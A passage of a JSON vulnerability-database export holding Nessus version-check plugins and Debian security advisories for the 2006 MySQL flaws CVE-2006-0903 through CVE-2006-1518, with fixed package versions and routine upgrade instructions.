attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1073\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient14\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient14-dev\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-client-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-common-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-server-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:59", "description": "5.0.21 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, and our bugs\n181335 182025 189054 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 5 : mysql-5.0.21-2.FC5.1 (2006-553)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mysql-devel", "p-cpe:/a:fedoraproject:fedora:mysql-test", "cpe:/o:fedoraproject:fedora_core:5", "p-cpe:/a:fedoraproject:fedora:mysql", "p-cpe:/a:fedoraproject:fedora:mysql-server", "p-cpe:/a:fedoraproject:fedora:mysql-bench"], "id": "FEDORA_2006-553.NASL", "href": "https://www.tenable.com/plugins/nessus/24105", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-553.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24105);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-553\");\n\n script_name(english:\"Fedora Core 5 : mysql-5.0.21-2.FC5.1 (2006-553)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"5.0.21 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, and our bugs\n181335 182025 189054 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-May/000078.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1af83b43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 
eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"mysql-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-bench-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-devel-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-server-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-test-5.0.21-2.FC5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server / mysql-test\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:59", "description": "4.1.19 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, also our bugs\n180467 180639 182025 183261 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 4 : mysql-4.1.19-1.FC4.1 (2006-554)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mysql-devel", "p-cpe:/a:fedoraproject:fedora:mysql", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:mysql-server", "p-cpe:/a:fedoraproject:fedora:mysql-bench"], "id": "FEDORA_2006-554.NASL", "href": "https://www.tenable.com/plugins/nessus/24106", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-554.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24106);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-554\");\n\n script_name(english:\"Fedora Core 4 : mysql-4.1.19-1.FC4.1 (2006-554)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"4.1.19 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, also our bugs\n180467 180639 182025 183261 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-May/000079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?917bd654\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) 
audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"mysql-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-bench-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-devel-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-server-4.1.19-1.FC4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:37", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. 
The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1079-1 : mysql-dfsg - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:mysql-dfsg"], "id": "DEBIAN_DSA-1079.NASL", "href": "https://www.tenable.com/plugins/nessus/22621", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1079. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22621);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"DSA\", value:\"1079\");\n\n script_name(english:\"Debian DSA-1079-1 : mysql-dfsg - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366044\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1079\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient12\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient12-dev\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-client\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-common\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-server\", reference:\"4.0.24-10sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:23:52", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1073-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 22nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql-dfsg-4.1\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nCERT advisory : VU#602457\nBugTraq IDs : 16850 17780\nDebian Bugs : 366043 366048 366162\n\nSeveral vulnerabilities have been discovered in MySQL, a popular 
SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 9, "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "id": "DEBIAN:DSA-1073-1:5FA93", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00159.html", "title": "[SECURITY] [DSA 1073-1] New MySQL 4.1 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:19:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory 
DSA 1079-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 29th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql-dfsg\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nCERT advisory : VU#602457\nBugTraq IDs : 16850 17780\nDebian Bugs : 366044 366049 366163\n\nSeveral vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n 
These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 7, "modified": "2006-05-29T00:00:00", "published": "2006-05-29T00:00:00", "id": "DEBIAN:DSA-1079-1:FCFFC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00165.html", "title": "[SECURITY] [DSA 1079-1] New MySQL 4.0 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:30:57", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", 
"CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1071-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 22nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nBugTraq ID : 16850 17780\nDebian Bugs : 366044 366049 366163 \n\nSeveral vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper 
configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 9, "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "id": "DEBIAN:DSA-1071-1:F1DE3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00157.html", "title": "[SECURITY] [DSA 1071-1] New MySQL 3.23 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": 